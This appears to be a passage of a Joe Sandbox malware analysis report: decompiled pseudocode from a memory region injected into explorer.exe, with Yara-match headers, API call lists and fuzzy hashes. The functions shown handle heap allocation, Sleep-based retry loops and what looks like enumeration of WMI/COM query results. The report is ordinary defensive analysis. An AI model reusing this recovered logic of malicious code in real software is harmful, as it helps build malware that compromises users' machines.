                                                                                                                                                                        						_v24 = _t38;
                                                                                                                                                                        						_push(0x7bc9a0);
                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                        						_t39 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        						_push(0x7bc9a0);
                                                                                                                                                                        						_v20 = E007A9A5A(_t39 + 0x1020);
                                                                                                                                                                        						_t42 = E007AB3C7(_t41,  &_v8); // executed
                                                                                                                                                                        						_v16 = _t42;
                                                                                                                                                                        						E007A8BAF( &_v24);
                                                                                                                                                                        						E007A8BAF( &_v20);
                                                                                                                                                                        						_t73 = _v16;
                                                                                                                                                                        						_t79 = _t78 + 0x3c;
                                                                                                                                                                        						_t71 = _v8;
                                                                                                                                                                        						if(_v16 != 0 && _t71 > 0x400) {
                                                                                                                                                                        							_t51 =  *0x7bf7e4; // 0xeafb48
                                                                                                                                                                        							if(_t71 >=  *(_t51 + 4)) {
                                                                                                                                                                        								_t71 =  *(_t51 + 4);
                                                                                                                                                                        							}
                                                                                                                                                                        							E007A8CBB(_v12 + 0x400, _t73 + 0x400, _t71 - 0x400);
                                                                                                                                                                        							_t71 = _v8;
                                                                                                                                                                        							_t79 = _t79 + 0xc;
                                                                                                                                                                        						}
                                                                                                                                                                        						E007A8BF4( &_v16, _t71);
                                                                                                                                                                        						E007A8BF4( &_v20, 0xfffffffe);
                                                                                                                                                                        						_t28 = _v12;
                                                                                                                                                                        						_t78 = _t79 + 0x10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t75 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t30 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        						_t32 = E007AB467(_t30 + 0x228, _t28, 0x1000); // executed
                                                                                                                                                                        						_t78 = _t78 + 0xc;
                                                                                                                                                                        						if(_t32 >= 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						Sleep(1);
                                                                                                                                                                        						_t75 = _t75 + 1;
                                                                                                                                                                        						if(_t75 < 0x2710) {
                                                                                                                                                                        							_t28 = _v12;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					E007A8BF4( &_v12, 0); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}
























                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • Sleep.KERNELBASE(00000001,?,00000000,00000000,?,?,?,?,007B0A51,?,?,?,007B0E19,00000000), ref: 007B0C54
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeapSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4201116106-0
                                                                                                                                                                        • Opcode ID: 804e2c14ae6248688378f997d9ce4fbeca32768f475de79a25387e24a590ad26
                                                                                                                                                                        • Instruction ID: 8503e2ab6ef3a59c5733a3ad814c0336e9736d5ada3fe2f30162f84bb4fe1d8c
                                                                                                                                                                        • Opcode Fuzzy Hash: 804e2c14ae6248688378f997d9ce4fbeca32768f475de79a25387e24a590ad26
                                                                                                                                                                        • Instruction Fuzzy Hash: F54185B1A00104EBDB14EBA4CC8AFEE77ACEB45304F148779F505E7282DB38E9458765
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E007AF236(void* __fp0, intOrPtr _a4) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				char _v544;
                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        
                                                                                                                                                                        				_t77 = __fp0;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                        				_t66 =  *0x7bf848; // 0xeaf898, executed
                                                                                                                                                                        				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                        					_t73 = 0;
                                                                                                                                                                        					if(_v20 <= 0) {
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t41 =  *0x7bf848; // 0xeaf898
                                                                                                                                                                        						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                        						_t48 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                                                                                                                                                                        						_t70 = E007A8BDE(_v16 + 1);
                                                                                                                                                                        						if(_t70 != 0) {
                                                                                                                                                                        							_v12 = 0x200;
                                                                                                                                                                        							_push( &_v32);
                                                                                                                                                                        							_push( &_v12);
                                                                                                                                                                        							_push( &_v544);
                                                                                                                                                                        							_push( &_v16);
                                                                                                                                                                        							_push(_t70);
                                                                                                                                                                        							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                                                                                                                                                                        							_t58 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                                                                                                                                                                        								E007A4FA3(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                                                                                                                                                                        								_t75 = _t75 + 0xc;
                                                                                                                                                                        								Sleep(0xa);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 = _t73 + 1;
                                                                                                                                                                        					} while (_t73 < _v20);
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t40 | 0xffffffff;
                                                                                                                                                                        			}





















                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 007AF304
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 0899e8e3844231c1d538e21fc6cb23b3d856e242103406cd0ae46af229b33f02
                                                                                                                                                                        • Instruction ID: 82f6b1a31323157437637cd670bd08d56da928981f3fcd070c078b16fbef91da
                                                                                                                                                                        • Opcode Fuzzy Hash: 0899e8e3844231c1d538e21fc6cb23b3d856e242103406cd0ae46af229b33f02
                                                                                                                                                                        • Instruction Fuzzy Hash: FD31C3B6900109AFDB11DFD8DC88EEEBBBCFB49314F1442AAE515E7251D7349A058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E007AB025(intOrPtr* __edx, void* __fp0) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        
                                                                                                                                                                        				_t54 = __fp0;
                                                                                                                                                                        				_push(_t28);
                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                        				_t26 = _t28;
                                                                                                                                                                        				if( *__edx > 0) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t20 = E007AAA00(_t26,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + _t46 * 8))); // executed
                                                                                                                                                                        						_t49 = _t20;
                                                                                                                                                                        						if(_t20 == 0) {
                                                                                                                                                                        							_t21 = E007A9F6F( *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + 4 + _t46 * 8)), _t49);
                                                                                                                                                                        							_v8 = _t21;
                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                        								L6:
                                                                                                                                                                        								E007AAA7E(_t21); // executed
                                                                                                                                                                        							} else {
                                                                                                                                                                        								if(GetLastError() != 0xd) {
                                                                                                                                                                        									_t21 = _v8;
                                                                                                                                                                        									goto L6;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									E007AAAA3( *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + _t46 * 8)), _t54,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + 4 + _t46 * 8))); // executed
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t46 = _t46 + 1;
                                                                                                                                                                        					} while (_t46 <  *_t43);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00000000,?,007A52C1), ref: 007AB05A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                        • Opcode ID: 48f6ad65256e24cf9b444c0a08cf6662de50c72b7784db320558544473699dbb
                                                                                                                                                                        • Instruction ID: 0f9da073dbc705915d994473cc3ea43a6f785cfaa7cae233a10c0baf7fe07851
                                                                                                                                                                        • Opcode Fuzzy Hash: 48f6ad65256e24cf9b444c0a08cf6662de50c72b7784db320558544473699dbb
                                                                                                                                                                        • Instruction Fuzzy Hash: A2017C38300002EB8B24EB69C68482BF7AAFFC63557208368E816C7312D735ED41CBD0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E007A6247(void* __ecx, void* __eflags) {
                                                                                                                                                                        				void* _t2;
                                                                                                                                                                        				WCHAR* _t3;
                                                                                                                                                                        				WCHAR* _t4;
                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                        				signed int _t8;
                                                                                                                                                                        				WCHAR* _t10;
                                                                                                                                                                        				void* _t11;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        
                                                                                                                                                                        				_t2 = E007A5CE2(__eflags); // executed
                                                                                                                                                                        				if(_t2 == 0) {
                                                                                                                                                                        					_t14 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t3 = E007A5EDD( *((intOrPtr*)(_t14 + 0xac)), 0, __eflags); // executed
                                                                                                                                                                        					 *0x7bf840 = _t3;
                                                                                                                                                                        					__eflags = _t3;
                                                                                                                                                                        					if(_t3 != 0) {
                                                                                                                                                                        						_t4 = E007AA9D6();
                                                                                                                                                                        						__eflags = _t4;
                                                                                                                                                                        						if(_t4 == 0) {
                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t6 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        							_t8 = lstrcmpiW(_t6 + 0x228, _t4);
                                                                                                                                                                        							asm("sbb eax, eax");
                                                                                                                                                                        							_t10 =  ~_t8 + 1;
                                                                                                                                                                        							__eflags = _t10;
                                                                                                                                                                        							return _t10;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t11 = 2;
                                                                                                                                                                        						return _t11;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t12 = 3;
                                                                                                                                                                        					return _t12;
                                                                                                                                                                        				}
                                                                                                                                                                        			}













                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 38c16e0352e0226c1ea6f19d8bc8c155704f9d4744c2c3eff9f9b2be3f72441c
                                                                                                                                                                        • Instruction ID: 4c1ee36469c52d1a3c3a6b694269fe566f88fc8d02c067825209f7a9fe31fdc7
                                                                                                                                                                        • Opcode Fuzzy Hash: 38c16e0352e0226c1ea6f19d8bc8c155704f9d4744c2c3eff9f9b2be3f72441c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8EE012B13516029AEF10A735AC19F2623D96BC6705F18C770F505DA1D9FF2CD901D514
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E007AEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char* _v72;
                                                                                                                                                                        				signed short _v80;
                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                        				char _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				char _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				char _v104;
                                                                                                                                                                        				char _v616;
                                                                                                                                                                        				intOrPtr* _t159;
                                                                                                                                                                        				char _t165;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				intOrPtr* _t187;
                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                        				intOrPtr* _t193;
                                                                                                                                                                        				intOrPtr _t200;
                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				intOrPtr* _t210;
                                                                                                                                                                        				intOrPtr _t212;
                                                                                                                                                                        				intOrPtr* _t213;
                                                                                                                                                                        				signed int _t214;
                                                                                                                                                                        				char _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                        				signed int _t230;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				signed int _t242;
                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                        				signed int _t244;
                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                        				intOrPtr* _t247;
                                                                                                                                                                        				intOrPtr* _t251;
                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                        				intOrPtr* _t253;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				intOrPtr* _t261;
                                                                                                                                                                        				signed int _t262;
                                                                                                                                                                        				signed int _t283;
                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                        				char* _t298;
                                                                                                                                                                        				void* _t320;
                                                                                                                                                                        				signed int _t322;
                                                                                                                                                                        				intOrPtr* _t323;
                                                                                                                                                                        				intOrPtr _t324;
                                                                                                                                                                        				signed int _t327;
                                                                                                                                                                        				intOrPtr* _t328;
                                                                                                                                                                        				intOrPtr* _t329;
                                                                                                                                                                        
                                                                                                                                                                        				_v32 = _v32 & 0x00000000;
                                                                                                                                                                        				_v60 = _v60 & 0x00000000;
                                                                                                                                                                        				_v56 = __edx;
                                                                                                                                                                        				_v100 = __ecx;
                                                                                                                                                                        				_t159 = E007AE400(__ecx);
                                                                                                                                                                        				_t251 = _t159;
                                                                                                                                                                        				_v104 = _t251;
                                                                                                                                                                        				if(_t251 == 0) {
                                                                                                                                                                        					return _t159;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t320 = E007A8BDE(0x10);
                                                                                                                                                                        				_v36 = _t320;
                                                                                                                                                                        				_pop(_t255);
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L53:
                                                                                                                                                                        					E007A8BF4( &_v60, 0xfffffffe);
                                                                                                                                                                        					E007AE4B4( &_v104);
                                                                                                                                                                        					return _t320;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t165 = E007A9DF2(_t255, 0x3a7);
                                                                                                                                                                        				 *_t328 = 0xae7;
                                                                                                                                                                        				_v52 = _t165;
                                                                                                                                                                        				_t166 = E007A9DF2(_t255);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_v56);
                                                                                                                                                                        				_v20 = _t166;
                                                                                                                                                                        				_push(_t166);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_t322 = E007A9A5A(_t165);
                                                                                                                                                                        				_v60 = _t322;
                                                                                                                                                                        				E007A8BAF( &_v52);
                                                                                                                                                                        				E007A8BAF( &_v20);
                                                                                                                                                                        				_t329 = _t328 + 0x20;
                                                                                                                                                                        				if(_t322 != 0) {
                                                                                                                                                                        					_t323 = __imp__#2;
                                                                                                                                                                        					_v40 =  *_t323(_t322);
                                                                                                                                                                        					_t173 = E007A9DF2(_t255, 0x886);
                                                                                                                                                                        					_v20 = _t173;
                                                                                                                                                                        					_v52 =  *_t323(_t173);
                                                                                                                                                                        					E007A8BAF( &_v20);
                                                                                                                                                                        					_t324 = _v40;
                                                                                                                                                                        					_t261 =  *_t251;
                                                                                                                                                                        					_t252 = 0;
                                                                                                                                                                        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                        					__eflags = _t178;
                                                                                                                                                                        					if(_t178 != 0) {
                                                                                                                                                                        						L52:
                                                                                                                                                                        						__imp__#6(_t324);
                                                                                                                                                                        						__imp__#6(_v52);
                                                                                                                                                                        						goto L53;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                        					__eflags = _t262;
                                                                                                                                                                        					if(_t262 == 0) {
                                                                                                                                                                        						L49:
                                                                                                                                                                        						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                        						__eflags = _t252;
                                                                                                                                                                        						if(_t252 == 0) {
                                                                                                                                                                        							E007A8BF4( &_v36, 0);
                                                                                                                                                                        							_t320 = _v36;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *(_t320 + 8) = _t252;
                                                                                                                                                                        							 *_t320 = E007A98BD(_v100);
                                                                                                                                                                        							 *((intOrPtr*)(_t320 + 4)) = E007A98BD(_v56);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L52;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                        						__eflags = _t186;
                                                                                                                                                                        						if(_t186 != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                        						_v48 = 0;
                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                        						__eflags = _v84;
                                                                                                                                                                        						if(_v84 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t187 = _v28;
                                                                                                                                                                        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                        						__eflags = _t188;
                                                                                                                                                                        						if(_t188 >= 0) {
                                                                                                                                                                        							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                        							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                        							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                        							_t253 = _t46;
                                                                                                                                                                        							_t327 = _t252 << 3;
                                                                                                                                                                        							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                        							_t192 = E007A8C72(_t327, _t47);
                                                                                                                                                                        							__eflags = _t192;
                                                                                                                                                                        							if(_t192 == 0) {
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t193 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                        								L46:
                                                                                                                                                                        								_t252 = _v20;
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E007A8BDE( *(_t327 +  *_t253) << 3);
                                                                                                                                                                        							_t200 =  *_t253;
                                                                                                                                                                        							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                        							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                        								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                        								E007A8BF4(_t136, 0);
                                                                                                                                                                        								E007A8BF4( &_v36, 0);
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t205 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                        								_t320 = _v36;
                                                                                                                                                                        								goto L46;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t207 = _v16;
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_v12 = _t207;
                                                                                                                                                                        								__eflags = _t207 - _v48;
                                                                                                                                                                        								if(_t207 > _v48) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44 = _v44 & 0x00000000;
                                                                                                                                                                        								_t209 =  &_v12;
                                                                                                                                                                        								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                        								__eflags = _t209;
                                                                                                                                                                        								if(_t209 < 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t212 = E007A98BD(_v44);
                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                        								_t213 = _v28;
                                                                                                                                                                        								_t281 =  *_t213;
                                                                                                                                                                        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                        								__eflags = _t214;
                                                                                                                                                                        								if(_t214 < 0) {
                                                                                                                                                                        									L39:
                                                                                                                                                                        									__imp__#6(_v44);
                                                                                                                                                                        									_t207 = _v12 + 1;
                                                                                                                                                                        									__eflags = _t207;
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v92 = E007A9DF2(_t281, 0xb28);
                                                                                                                                                                        								 *_t329 = 0x83f;
                                                                                                                                                                        								_t217 = E007A9DF2(_t281);
                                                                                                                                                                        								_t283 = _v80;
                                                                                                                                                                        								_v96 = _t217;
                                                                                                                                                                        								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                        								__eflags = _t218 - 0xb;
                                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                                        									_t219 = _t218 - 0x10;
                                                                                                                                                                        									__eflags = _t219;
                                                                                                                                                                        									if(_t219 == 0) {
                                                                                                                                                                        										L35:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E007A8BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											L38:
                                                                                                                                                                        											E007A8BAF( &_v92);
                                                                                                                                                                        											E007A8BAF( &_v96);
                                                                                                                                                                        											__imp__#9( &_v80);
                                                                                                                                                                        											goto L39;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%d");
                                                                                                                                                                        										L37:
                                                                                                                                                                        										_push(0xc);
                                                                                                                                                                        										_push(_t289);
                                                                                                                                                                        										E007A9E51();
                                                                                                                                                                        										_t329 = _t329 + 0x10;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t230 = _t219 - 1;
                                                                                                                                                                        									__eflags = _t230;
                                                                                                                                                                        									if(_t230 == 0) {
                                                                                                                                                                        										L33:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E007A8BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											goto L38;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%u");
                                                                                                                                                                        										goto L37;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t235 = _t230 - 1;
                                                                                                                                                                        									__eflags = _t235;
                                                                                                                                                                        									if(_t235 == 0) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t235 == 1;
                                                                                                                                                                        									if(_t235 == 1) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									L28:
                                                                                                                                                                        									__eflags = _t283 & 0x00002000;
                                                                                                                                                                        									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                        										_v88 = E007A9DF2(_t283, 0xe0a);
                                                                                                                                                                        										E007A9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                        										E007A8BAF( &_v88);
                                                                                                                                                                        										_t329 = _t329 + 0x18;
                                                                                                                                                                        										_t298 =  &_v616;
                                                                                                                                                                        										L31:
                                                                                                                                                                        										_t242 = E007A98BD(_t298);
                                                                                                                                                                        										L32:
                                                                                                                                                                        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t242 = E007AE92E( &_v80);
                                                                                                                                                                        									goto L32;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                        									__eflags = _v72 - 0xffff;
                                                                                                                                                                        									_t298 = L"TRUE";
                                                                                                                                                                        									if(_v72 != 0xffff) {
                                                                                                                                                                        										_t298 = L"FALSE";
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L31;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t243 = _t218 - 1;
                                                                                                                                                                        								__eflags = _t243;
                                                                                                                                                                        								if(_t243 == 0) {
                                                                                                                                                                        									goto L38;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t244 = _t243 - 1;
                                                                                                                                                                        								__eflags = _t244;
                                                                                                                                                                        								if(_t244 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t245 = _t244 - 1;
                                                                                                                                                                        								__eflags = _t245;
                                                                                                                                                                        								if(_t245 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t245 != 5;
                                                                                                                                                                        								if(_t245 != 5) {
                                                                                                                                                                        									goto L28;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t298 = _v72;
                                                                                                                                                                        								goto L31;
